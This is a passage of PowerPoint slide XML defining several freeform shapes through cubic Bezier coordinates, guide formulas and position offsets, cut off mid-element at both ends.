                      <a:pt x="270618" y="352027"/>
                      <a:pt x="267189" y="356028"/>
                      <a:pt x="263832" y="360671"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="255459" y="375924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="405752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4320" y="375171"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3177" y="355170"/>
                      <a:pt x="4320" y="334598"/>
                      <a:pt x="4892" y="314597"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15178" y="277453"/>
                      <a:pt x="25464" y="241451"/>
                      <a:pt x="35750" y="204306"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46036" y="169448"/>
                      <a:pt x="61466" y="136875"/>
                      <a:pt x="91753" y="115731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112897" y="101444"/>
                      <a:pt x="136326" y="89444"/>
                      <a:pt x="160899" y="82586"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205472" y="69443"/>
                      <a:pt x="243188" y="43728"/>
                      <a:pt x="284904" y="24870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="317906" y="10298"/>
                      <a:pt x="350586" y="-1703"/>
                      <a:pt x="386561" y="19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361E591-D8C0-4E8F-928E-15998A2B55D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10428262" y="3872083"/>
                <a:ext cx="645715" cy="909260"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 512822"/>
                  <a:gd name="connsiteY0" fmla="*/ 736605 h 919256"/>
                  <a:gd name="connsiteX1" fmla="*/ 219438 w 512822"/>
                  <a:gd name="connsiteY1" fmla="*/ 585741 h 919256"/>
                  <a:gd name="connsiteX2" fmla="*/ 358302 w 512822"/>
                  <a:gd name="connsiteY2" fmla="*/ 425733 h 919256"/>
                  <a:gd name="connsiteX3" fmla="*/ 421162 w 512822"/>
                  <a:gd name="connsiteY3" fmla="*/ 241725 h 919256"/>
                  <a:gd name="connsiteX4" fmla="*/ 420590 w 512822"/>
                  <a:gd name="connsiteY4" fmla="*/ 81146 h 919256"/>
                  <a:gd name="connsiteX5" fmla="*/ 502880 w 512822"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 919256"/>
                  <a:gd name="connsiteX6" fmla="*/ 496022 w 512822"/>
                  <a:gd name="connsiteY6" fmla="*/ 25144 h 919256"/>
                  <a:gd name="connsiteX7" fmla="*/ 462306 w 512822"/>
                  <a:gd name="connsiteY7" fmla="*/ 123434 h 919256"/>
                  <a:gd name="connsiteX8" fmla="*/ 464021 w 512822"/>
                  <a:gd name="connsiteY8" fmla="*/ 476021 h 919256"/>
                  <a:gd name="connsiteX9" fmla="*/ 405733 w 512822"/>
                  <a:gd name="connsiteY9" fmla="*/ 625171 h 919256"/>
                  <a:gd name="connsiteX10" fmla="*/ 256011 w 512822"/>
                  <a:gd name="connsiteY10" fmla="*/ 779464 h 919256"/>
                  <a:gd name="connsiteX11" fmla="*/ 169150 w 512822"/>
                  <a:gd name="connsiteY11" fmla="*/ 900041 h 919256"/>
                  <a:gd name="connsiteX12" fmla="*/ 126291 w 512822"/>
                  <a:gd name="connsiteY12" fmla="*/ 899469 h 919256"/>
                  <a:gd name="connsiteX13" fmla="*/ 0 w 512822"/>
                  <a:gd name="connsiteY13" fmla="*/ 736605 h 919256"/>
                  <a:gd name="connsiteX14" fmla="*/ 0 w 512822"/>
                  <a:gd name="connsiteY14" fmla="*/ 736605 h 919256"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 519739"/>
                  <a:gd name="connsiteY0" fmla="*/ 731179 h 913830"/>
                  <a:gd name="connsiteX1" fmla="*/ 219438 w 519739"/>
                  <a:gd name="connsiteY1" fmla="*/ 580315 h 913830"/>
                  <a:gd name="connsiteX2" fmla="*/ 358302 w 519739"/>
                  <a:gd name="connsiteY2" fmla="*/ 420307 h 913830"/>
                  <a:gd name="connsiteX3" fmla="*/ 421162 w 519739"/>
                  <a:gd name="connsiteY3" fmla="*/ 236299 h 913830"/>
                  <a:gd name="connsiteX4" fmla="*/ 420590 w 519739"/>
                  <a:gd name="connsiteY4" fmla="*/ 75720 h 913830"/>
                  <a:gd name="connsiteX5" fmla="*/ 511020 w 519739"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 913830"/>
                  <a:gd name="connsiteX6" fmla="*/ 496022 w 519739"/>
                  <a:gd name="connsiteY6" fmla="*/ 19718 h 913830"/>
                  <a:gd name="connsiteX7" fmla="*/ 462306 w 519739"/>
                  <a:gd name="connsiteY7" fmla="*/ 118008 h 913830"/>
                  <a:gd name="connsiteX8" fmla="*/ 464021 w 519739"/>
                  <a:gd name="connsiteY8" fmla="*/ 470595 h 913830"/>
                  <a:gd name="connsiteX9" fmla="*/ 405733 w 519739"/>
                  <a:gd name="connsiteY9" fmla="*/ 619745 h 913830"/>
                  <a:gd name="connsiteX10" fmla="*/ 256011 w 519739"/>
                  <a:gd name="connsiteY10" fmla="*/ 774038 h 913830"/>
                  <a:gd name="connsiteX11" fmla="*/ 169150 w 519739"/>
                  <a:gd name="connsiteY11" fmla="*/ 894615 h 913830"/>
                  <a:gd name="connsiteX12" fmla="*/ 126291 w 519739"/>
                  <a:gd name="connsiteY12" fmla="*/ 894043 h 913830"/>
                  <a:gd name="connsiteX13" fmla="*/ 0 w 519739"/>
                  <a:gd name="connsiteY13" fmla="*/ 731179 h 913830"/>
                  <a:gd name="connsiteX14" fmla="*/ 0 w 519739"/>
                  <a:gd name="connsiteY14" fmla="*/ 731179 h 913830"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 511708"/>
                  <a:gd name="connsiteY0" fmla="*/ 732001 h 914652"/>
                  <a:gd name="connsiteX1" fmla="*/ 219438 w 511708"/>
                  <a:gd name="connsiteY1" fmla="*/ 581137 h 914652"/>
                  <a:gd name="connsiteX2" fmla="*/ 358302 w 511708"/>
                  <a:gd name="connsiteY2" fmla="*/ 421129 h 914652"/>
                  <a:gd name="connsiteX3" fmla="*/ 421162 w 511708"/>
                  <a:gd name="connsiteY3" fmla="*/ 237121 h 914652"/>
                  <a:gd name="connsiteX4" fmla="*/ 420590 w 511708"/>
                  <a:gd name="connsiteY4" fmla="*/ 76542 h 914652"/>
                  <a:gd name="connsiteX5" fmla="*/ 511020 w 511708"/>
                  <a:gd name="connsiteY5" fmla="*/ 822 h 914652"/>
                  <a:gd name="connsiteX6" fmla="*/ 462306 w 511708"/>
                  <a:gd name="connsiteY6" fmla="*/ 118830 h 914652"/>
                  <a:gd name="connsiteX7" fmla="*/ 464021 w 511708"/>
                  <a:gd name="connsiteY7" fmla="*/ 471417 h 914652"/>
                  <a:gd name="connsiteX8" fmla="*/ 405733 w 511708"/>
                  <a:gd name="connsiteY8" fmla="*/ 620567 h 914652"/>
                  <a:gd name="connsiteX9" fmla="*/ 256011 w 511708"/>
                  <a:gd name="connsiteY9" fmla="*/ 774860 h 914652"/>
                  <a:gd name="connsiteX10" fmla="*/ 169150 w 511708"/>
                  <a:gd name="connsiteY10" fmla="*/ 895437 h 914652"/>
                  <a:gd name="connsiteX11" fmla="*/ 126291 w 511708"/>
                  <a:gd name="connsiteY11" fmla="*/ 894865 h 914652"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 511708"/>
                  <a:gd name="connsiteY12" fmla="*/ 732001 h 914652"/>
                  <a:gd name="connsiteX13" fmla="*/ 0 w 511708"/>
                  <a:gd name="connsiteY13" fmla="*/ 732001 h 914652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3047"/>
                  <a:gd name="connsiteY0" fmla="*/ 743213 h 925864"/>
                  <a:gd name="connsiteX1" fmla="*/ 219438 w 623047"/>
                  <a:gd name="connsiteY1" fmla="*/ 592349 h 925864"/>
                  <a:gd name="connsiteX2" fmla="*/ 358302 w 623047"/>
                  <a:gd name="connsiteY2" fmla="*/ 432341 h 925864"/>
                  <a:gd name="connsiteX3" fmla="*/ 421162 w 623047"/>
                  <a:gd name="connsiteY3" fmla="*/ 248333 h 925864"/>
                  <a:gd name="connsiteX4" fmla="*/ 420590 w 623047"/>
                  <a:gd name="connsiteY4" fmla="*/ 87754 h 925864"/>
                  <a:gd name="connsiteX5" fmla="*/ 511020 w 623047"/>
                  <a:gd name="connsiteY5" fmla="*/ 12034 h 925864"/>
                  <a:gd name="connsiteX6" fmla="*/ 622395 w 623047"/>
                  <a:gd name="connsiteY6" fmla="*/ 306409 h 925864"/>
                  <a:gd name="connsiteX7" fmla="*/ 464021 w 623047"/>
                  <a:gd name="connsiteY7" fmla="*/ 482629 h 925864"/>
                  <a:gd name="connsiteX8" fmla="*/ 405733 w 623047"/>
                  <a:gd name="connsiteY8" fmla="*/ 631779 h 925864"/>
                  <a:gd name="connsiteX9" fmla="*/ 256011 w 623047"/>
                  <a:gd name="connsiteY9" fmla="*/ 786072 h 925864"/>
                  <a:gd name="connsiteX10" fmla="*/ 169150 w 623047"/>
                  <a:gd name="connsiteY10" fmla="*/ 906649 h 925864"/>
                  <a:gd name="connsiteX11" fmla="*/ 126291 w 623047"/>
                  <a:gd name="connsiteY11" fmla="*/ 906077 h 925864"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 623047"/>
                  <a:gd name="connsiteY12" fmla="*/ 743213 h 925864"/>
                  <a:gd name="connsiteX13" fmla="*/ 0 w 623047"/>
                  <a:gd name="connsiteY13" fmla="*/ 743213 h 925864"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 622395"/>
                  <a:gd name="connsiteY0" fmla="*/ 743213 h 925864"/>
                  <a:gd name="connsiteX1" fmla="*/ 219438 w 622395"/>
                  <a:gd name="connsiteY1" fmla="*/ 592349 h 925864"/>
                  <a:gd name="connsiteX2" fmla="*/ 358302 w 622395"/>
                  <a:gd name="connsiteY2" fmla="*/ 432341 h 925864"/>
                  <a:gd name="connsiteX3" fmla="*/ 421162 w 622395"/>
                  <a:gd name="connsiteY3" fmla="*/ 248333 h 925864"/>
                  <a:gd name="connsiteX4" fmla="*/ 420590 w 622395"/>
                  <a:gd name="connsiteY4" fmla="*/ 87754 h 925864"/>
                  <a:gd name="connsiteX5" fmla="*/ 511020 w 622395"/>
                  <a:gd name="connsiteY5" fmla="*/ 12034 h 925864"/>
                  <a:gd name="connsiteX6" fmla="*/ 622395 w 622395"/>
                  <a:gd name="connsiteY6" fmla="*/ 306409 h 925864"/>
                  <a:gd name="connsiteX7" fmla="*/ 405733 w 622395"/>
                  <a:gd name="connsiteY7" fmla="*/ 631779 h 925864"/>
                  <a:gd name="connsiteX8" fmla="*/ 256011 w 622395"/>
                  <a:gd name="connsiteY8" fmla="*/ 786072 h 925864"/>
                  <a:gd name="connsiteX9" fmla="*/ 169150 w 622395"/>
                  <a:gd name="connsiteY9" fmla="*/ 906649 h 925864"/>
                  <a:gd name="connsiteX10" fmla="*/ 126291 w 622395"/>
                  <a:gd name="connsiteY10" fmla="*/ 906077 h 925864"/>
                  <a:gd name="connsiteX11" fmla="*/ 0 w 622395"/>
                  <a:gd name="connsiteY11" fmla="*/ 743213 h 925864"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 622395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30897"/>
                  <a:gd name="connsiteY0" fmla="*/ 710234 h 925864"/>
                  <a:gd name="connsiteX1" fmla="*/ 225227 w 630897"/>
                  <a:gd name="connsiteY1" fmla="*/ 592349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18267 w 630897"/>
                  <a:gd name="connsiteY3" fmla="*/ 242336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09914 h 925544"/>
                  <a:gd name="connsiteX1" fmla="*/ 219439 w 630897"/>
                  <a:gd name="connsiteY1" fmla="*/ 580036 h 925544"/>
                  <a:gd name="connsiteX2" fmla="*/ 352514 w 630897"/>
                  <a:gd name="connsiteY2" fmla="*/ 423027 h 925544"/>
                  <a:gd name="connsiteX3" fmla="*/ 418267 w 630897"/>
                  <a:gd name="connsiteY3" fmla="*/ 242016 h 925544"/>
                  <a:gd name="connsiteX4" fmla="*/ 417696 w 630897"/>
                  <a:gd name="connsiteY4" fmla="*/ 90432 h 925544"/>
                  <a:gd name="connsiteX5" fmla="*/ 516809 w 630897"/>
                  <a:gd name="connsiteY5" fmla="*/ 11714 h 925544"/>
                  <a:gd name="connsiteX6" fmla="*/ 630897 w 630897"/>
                  <a:gd name="connsiteY6" fmla="*/ 333223 h 925544"/>
                  <a:gd name="connsiteX7" fmla="*/ 411522 w 630897"/>
                  <a:gd name="connsiteY7" fmla="*/ 631459 h 925544"/>
                  <a:gd name="connsiteX8" fmla="*/ 261800 w 630897"/>
                  <a:gd name="connsiteY8" fmla="*/ 785752 h 925544"/>
                  <a:gd name="connsiteX9" fmla="*/ 174939 w 630897"/>
                  <a:gd name="connsiteY9" fmla="*/ 906329 h 925544"/>
                  <a:gd name="connsiteX10" fmla="*/ 132080 w 630897"/>
                  <a:gd name="connsiteY10" fmla="*/ 905757 h 925544"/>
                  <a:gd name="connsiteX11" fmla="*/ 5789 w 630897"/>
                  <a:gd name="connsiteY11" fmla="*/ 742893 h 925544"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 630897"/>
                  <a:gd name="connsiteY12" fmla="*/ 709914 h 925544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5789 w 630897"/>
                  <a:gd name="connsiteY11" fmla="*/ 737556 h 920207"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 630897"/>
                  <a:gd name="connsiteY12" fmla="*/ 704577 h 920207"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 625108"/>
                  <a:gd name="connsiteY0" fmla="*/ 737556 h 920207"/>
                  <a:gd name="connsiteX1" fmla="*/ 213650 w 625108"/>
                  <a:gd name="connsiteY1" fmla="*/ 574699 h 920207"/>
                  <a:gd name="connsiteX2" fmla="*/ 346725 w 625108"/>
                  <a:gd name="connsiteY2" fmla="*/ 417690 h 920207"/>
                  <a:gd name="connsiteX3" fmla="*/ 412478 w 625108"/>
                  <a:gd name="connsiteY3" fmla="*/ 236679 h 920207"/>
                  <a:gd name="connsiteX4" fmla="*/ 411907 w 625108"/>
                  <a:gd name="connsiteY4" fmla="*/ 85095 h 920207"/>
                  <a:gd name="connsiteX5" fmla="*/ 499443 w 625108"/>
                  <a:gd name="connsiteY5" fmla="*/ 12373 h 920207"/>
                  <a:gd name="connsiteX6" fmla="*/ 625108 w 625108"/>
                  <a:gd name="connsiteY6" fmla="*/ 327886 h 920207"/>
                  <a:gd name="connsiteX7" fmla="*/ 405733 w 625108"/>
                  <a:gd name="connsiteY7" fmla="*/ 626122 h 920207"/>
                  <a:gd name="connsiteX8" fmla="*/ 256011 w 625108"/>
                  <a:gd name="connsiteY8" fmla="*/ 780415 h 920207"/>
                  <a:gd name="connsiteX9" fmla="*/ 169150 w 625108"/>
                  <a:gd name="connsiteY9" fmla="*/ 900992 h 920207"/>
                  <a:gd name="connsiteX10" fmla="*/ 126291 w 625108"/>
                  <a:gd name="connsiteY10" fmla="*/ 900420 h 920207"/>
                  <a:gd name="connsiteX11" fmla="*/ 0 w 625108"/>
                  <a:gd name="connsiteY11" fmla="*/ 737556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0897" h="920207">
                    <a:moveTo>
                      <a:pt x="0" y="704577"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="87618" y="688266"/>
                      <a:pt x="160687" y="622513"/>
                      <a:pt x="219439" y="574699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278191" y="526885"/>
                      <a:pt x="319376" y="474027"/>
                      <a:pt x="352514" y="417690"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="385652" y="361353"/>
                      <a:pt x="419981" y="306397"/>
                      <a:pt x="418267" y="236679"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="416552" y="182962"/>
                      <a:pt x="417696" y="138812"/>
                      <a:pt x="417696" y="85095"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418268" y="41665"/>
                      <a:pt x="472050" y="-28592"/>
                      <a:pt x="505232" y="12373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="516707" y="96752"/>
                      <a:pt x="592603" y="208754"/>
                      <a:pt x="630897" y="327886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="602496" y="423037"/>
                      <a:pt x="473038" y="550701"/>
                      <a:pt x="411522" y="626122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="350006" y="701543"/>
                      <a:pt x="301231" y="734698"/>
                      <a:pt x="261800" y="780415"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232085" y="815273"/>
                      <a:pt x="201798" y="863847"/>
                      <a:pt x="174939" y="900992"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156081" y="926707"/>
                      <a:pt x="150367" y="926707"/>
                      <a:pt x="132080" y="900420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108651" y="865561"/>
                      <a:pt x="17144" y="722863"/>
                      <a:pt x="0" y="704577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26A18C2-201C-45D2-BD86-7946D9456830}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9722967" y="2819156"/>
                <a:ext cx="1170564" cy="1037049"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1175339 w 1192482"/>
                  <a:gd name="connsiteY0" fmla="*/ 576597 h 1056467"/>
                  <a:gd name="connsiteX1" fmla="*/ 1038761 w 1192482"/>
                  <a:gd name="connsiteY1" fmla="*/ 284013 h 1056467"/>
                  <a:gd name="connsiteX2" fmla="*/ 690746 w 1192482"/>
                  <a:gd name="connsiteY2" fmla="*/ 24001 h 1056467"/>
                  <a:gd name="connsiteX3" fmla="*/ 619314 w 1192482"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 1056467"/>
                  <a:gd name="connsiteX4" fmla="*/ 644458 w 1192482"/>
                  <a:gd name="connsiteY4" fmla="*/ 29144 h 1056467"/>
                  <a:gd name="connsiteX5" fmla="*/ 664458 w 1192482"/>
                  <a:gd name="connsiteY5" fmla="*/ 61146 h 1056467"/>
                  <a:gd name="connsiteX6" fmla="*/ 625028 w 1192482"/>
                  <a:gd name="connsiteY6" fmla="*/ 64574 h 1056467"/>
                  <a:gd name="connsiteX7" fmla="*/ 500451 w 1192482"/>
                  <a:gd name="connsiteY7" fmla="*/ 36002 h 1056467"/>
                  <a:gd name="connsiteX8" fmla="*/ 395875 w 1192482"/>
                  <a:gd name="connsiteY8" fmla="*/ 62860 h 1056467"/>
                  <a:gd name="connsiteX9" fmla="*/ 307871 w 1192482"/>
                  <a:gd name="connsiteY9" fmla="*/ 134863 h 1056467"/>
                  <a:gd name="connsiteX10" fmla="*/ 278727 w 1192482"/>
                  <a:gd name="connsiteY10" fmla="*/ 143435 h 1056467"/>
                  <a:gd name="connsiteX11" fmla="*/ 280441 w 1192482"/>
                  <a:gd name="connsiteY11" fmla="*/ 111434 h 1056467"/>
                  <a:gd name="connsiteX12" fmla="*/ 311871 w 1192482"/>
                  <a:gd name="connsiteY12" fmla="*/ 47431 h 1056467"/>
                  <a:gd name="connsiteX13" fmla="*/ 206152 w 1192482"/>
                  <a:gd name="connsiteY13" fmla="*/ 157721 h 1056467"/>
                  <a:gd name="connsiteX14" fmla="*/ 221581 w 1192482"/>
                  <a:gd name="connsiteY14" fmla="*/ 57717 h 1056467"/>
                  <a:gd name="connsiteX15" fmla="*/ 133006 w 1192482"/>
                  <a:gd name="connsiteY15" fmla="*/ 250297 h 1056467"/>
                  <a:gd name="connsiteX16" fmla="*/ 103290 w 1192482"/>
                  <a:gd name="connsiteY16" fmla="*/ 122291 h 1056467"/>
                  <a:gd name="connsiteX17" fmla="*/ 82146 w 1192482"/>
                  <a:gd name="connsiteY17" fmla="*/ 148578 h 1056467"/>
                  <a:gd name="connsiteX18" fmla="*/ 23858 w 1192482"/>
                  <a:gd name="connsiteY18" fmla="*/ 275441 h 1056467"/>
                  <a:gd name="connsiteX19" fmla="*/ 25001 w 1192482"/>
                  <a:gd name="connsiteY19" fmla="*/ 517166 h 1056467"/>
                  <a:gd name="connsiteX20" fmla="*/ 54145 w 1192482"/>
                  <a:gd name="connsiteY20" fmla="*/ 687460 h 1056467"/>
                  <a:gd name="connsiteX21" fmla="*/ 129577 w 1192482"/>
                  <a:gd name="connsiteY21" fmla="*/ 948614 h 1056467"/>
                  <a:gd name="connsiteX22" fmla="*/ 131863 w 1192482"/>
                  <a:gd name="connsiteY22" fmla="*/ 906898 h 1056467"/>
                  <a:gd name="connsiteX23" fmla="*/ 115291 w 1192482"/>
                  <a:gd name="connsiteY23" fmla="*/ 736033 h 1056467"/>
                  <a:gd name="connsiteX24" fmla="*/ 254154 w 1192482"/>
                  <a:gd name="connsiteY24" fmla="*/ 574883 h 1056467"/>
                  <a:gd name="connsiteX25" fmla="*/ 365017 w 1192482"/>
                  <a:gd name="connsiteY25" fmla="*/ 556025 h 1056467"/>
                  <a:gd name="connsiteX26" fmla="*/ 473593 w 1192482"/>
                  <a:gd name="connsiteY26" fmla="*/ 509166 h 1056467"/>
                  <a:gd name="connsiteX27" fmla="*/ 556454 w 1192482"/>
                  <a:gd name="connsiteY27" fmla="*/ 454878 h 1056467"/>
                  <a:gd name="connsiteX28" fmla="*/ 699317 w 1192482"/>
                  <a:gd name="connsiteY28" fmla="*/ 414876 h 1056467"/>
                  <a:gd name="connsiteX29" fmla="*/ 798750 w 1192482"/>
                  <a:gd name="connsiteY29" fmla="*/ 489165 h 1056467"/>
                  <a:gd name="connsiteX30" fmla="*/ 823323 w 1192482"/>
                  <a:gd name="connsiteY30" fmla="*/ 554311 h 1056467"/>
                  <a:gd name="connsiteX31" fmla="*/ 961615 w 1192482"/>
                  <a:gd name="connsiteY31" fmla="*/ 729747 h 1056467"/>
                  <a:gd name="connsiteX32" fmla="*/ 1021617 w 1192482"/>
                  <a:gd name="connsiteY32" fmla="*/ 850895 h 1056467"/>
                  <a:gd name="connsiteX33" fmla="*/ 1078192 w 1192482"/>
                  <a:gd name="connsiteY33" fmla="*/ 1028046 h 1056467"/>
                  <a:gd name="connsiteX34" fmla="*/ 1105621 w 1192482"/>
                  <a:gd name="connsiteY34" fmla="*/ 1056048 h 1056467"/>
                  <a:gd name="connsiteX35" fmla="*/ 1117622 w 1192482"/>
                  <a:gd name="connsiteY35" fmla="*/ 1021760 h 1056467"/>
                  <a:gd name="connsiteX36" fmla="*/ 1093049 w 1192482"/>
                  <a:gd name="connsiteY36" fmla="*/ 913184 h 1056467"/>
                  <a:gd name="connsiteX37" fmla="*/ 1097049 w 1192482"/>
                  <a:gd name="connsiteY37" fmla="*/ 776606 h 1056467"/>
                  <a:gd name="connsiteX38" fmla="*/ 1151909 w 1192482"/>
                  <a:gd name="connsiteY38" fmla="*/ 682316 h 1056467"/>
                  <a:gd name="connsiteX39" fmla="*/ 1192482 w 1192482"/>
                  <a:gd name="connsiteY39" fmla="*/ 640600 h 1056467"/>
                  <a:gd name="connsiteX40" fmla="*/ 1175339 w 1192482"/>
                  <a:gd name="connsiteY40" fmla="*/ 576597 h 105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92482" h="1056467">
                    <a:moveTo>
                      <a:pt x="1175339" y="576597"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1145052" y="472021"/>
                      <a:pt x="1118193" y="364016"/>
                      <a:pt x="1038761" y="284013"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="935899" y="180580"/>
                      <a:pt x="821037" y="91433"/>
                      <a:pt x="690746" y="24001"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="669030" y="12572"/>
                      <a:pt x="646172" y="2286"/>
                      <a:pt x="619314" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623885" y="14858"/>
                      <a:pt x="636457" y="20001"/>
                      <a:pt x="644458" y="29144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653029" y="38859"/>
                      <a:pt x="670745" y="48574"/>
                      <a:pt x="664458" y="61146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="657030" y="76003"/>
                      <a:pt x="638172" y="67432"/>
                      <a:pt x="625028" y="64574"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="583312" y="55431"/>
                      <a:pt x="542167" y="45716"/>
                      <a:pt x="500451" y="36002"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="460449" y="26287"/>
                      <a:pt x="426162" y="34287"/>
                      <a:pt x="395875" y="62860"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="368445" y="88575"/>
                      <a:pt x="339872" y="114291"/>
                      <a:pt x="307871" y="134863"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299299" y="140578"/>
                      <a:pt x="288442" y="150292"/>
                      <a:pt x="278727" y="143435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="266726" y="134863"/>
                      <a:pt x="275869" y="121720"/>
                      <a:pt x="280441" y="111434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="290156" y="89718"/>
                      <a:pt x="301585" y="69146"/>
                      <a:pt x="311871" y="47431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="266726" y="73146"/>
                      <a:pt x="239297" y="116005"/>
                      <a:pt x="206152" y="157721"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198723" y="120005"/>
                      <a:pt x="214152" y="92576"/>
                      <a:pt x="221581" y="57717"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165579" y="111434"/>
                      <a:pt x="139863" y="173151"/>
                      <a:pt x="133006" y="250297"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97576" y="208581"/>
                      <a:pt x="117005" y="162293"/>
                      <a:pt x="103290" y="122291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91861" y="129720"/>
                      <a:pt x="87290" y="139435"/>
                      <a:pt x="82146" y="148578"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59860" y="189723"/>
                      <a:pt x="40430" y="232010"/>
                      <a:pt x="23858" y="275441"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-7572" y="356016"/>
                      <a:pt x="-8715" y="437163"/>
                      <a:pt x="25001" y="517166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48431" y="572026"/>
                      <a:pt x="58717" y="628028"/>
                      <a:pt x="54145" y="687460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47288" y="783464"/>
                      <a:pt x="76432" y="869753"/>
                      <a:pt x="129577" y="948614"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140435" y="935471"/>
                      <a:pt x="134149" y="920613"/>
                      <a:pt x="131863" y="906898"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122148" y="850324"/>
                      <a:pt x="114719" y="793750"/>
                      <a:pt x="115291" y="736033"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116434" y="630314"/>
                      <a:pt x="150721" y="590312"/>
                      <a:pt x="254154" y="574883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291299" y="569169"/>
                      <a:pt x="329015" y="566883"/>
                      <a:pt x="365017" y="556025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="404447" y="547453"/>
                      <a:pt x="439877" y="530881"/>
                      <a:pt x="473593" y="509166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501023" y="491451"/>
                      <a:pt x="528452" y="472593"/>
                      <a:pt x="556454" y="454878"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="599884" y="426305"/>
                      <a:pt x="646743" y="413161"/>
                      <a:pt x="699317" y="414876"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="757605" y="417162"/>
                      <a:pt x="781035" y="432591"/>
                      <a:pt x="798750" y="489165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="805608" y="511452"/>
                      <a:pt x="811894" y="533738"/>
                      <a:pt x="823323" y="554311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="860467" y="620028"/>
                      <a:pt x="916470" y="670887"/>
                      <a:pt x="961615" y="729747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="962758" y="731462"/>
                      <a:pt x="1016475" y="838895"/>
                      <a:pt x="1021617" y="850895"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045619" y="908612"/>
                      <a:pt x="1059334" y="969187"/>
                      <a:pt x="1078192" y="1028046"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1082192" y="1041190"/>
                      <a:pt x="1087335" y="1059476"/>
                      <a:pt x="1105621" y="1056048"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1122194" y="1053190"/>
                      <a:pt x="1118765" y="1034332"/>
